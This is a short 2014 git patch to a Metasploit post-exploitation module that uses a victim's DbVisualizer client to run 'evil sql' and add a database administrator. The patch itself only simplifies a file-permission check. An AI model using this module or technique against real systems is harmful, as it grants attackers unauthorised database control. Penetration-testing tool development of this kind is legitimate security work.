From 5f38ad5e106c588949eb7274218fd42419f1136b Mon Sep 17 00:00:00 2001 From: David Bloom Date: Wed, 16 Jul 2014 18:30:23 +0200 Subject: [PATCH] Update dbvis_add_db_admin.rb --- modules/post/multi/manage/dbvis_add_db_admin.rb | 9 +-------- 1 file changed, 1 insertion(+), 8 deletions(-) diff --git a/modules/post/multi/manage/dbvis_add_db_admin.rb b/modules/post/multi/manage/dbvis_add_db_admin.rb index 2f14d5f7a7..166d769c29 100644 --- a/modules/post/multi/manage/dbvis_add_db_admin.rb +++ b/modules/post/multi/manage/dbvis_add_db_admin.rb @@ -198,14 +198,7 @@ class Metasploit3 < Msf::Post if file?(dbvis)==true can_exec = false f = session.fs.file.stat(dbvis) - if f.uid == Process.euid - can_exec = true - else - if Process.groups.include?f.gid - can_exec = true - end - end - if can_exec == true + if f.uid == Process.euid or Process.groups.include?f.gid print_status("Trying to execute evil sql, it can take time ...") args = "-connection #{datastore['DBALIAS']} -sql \"#{sql}\"" dbvis ="\"#{dbvis}\""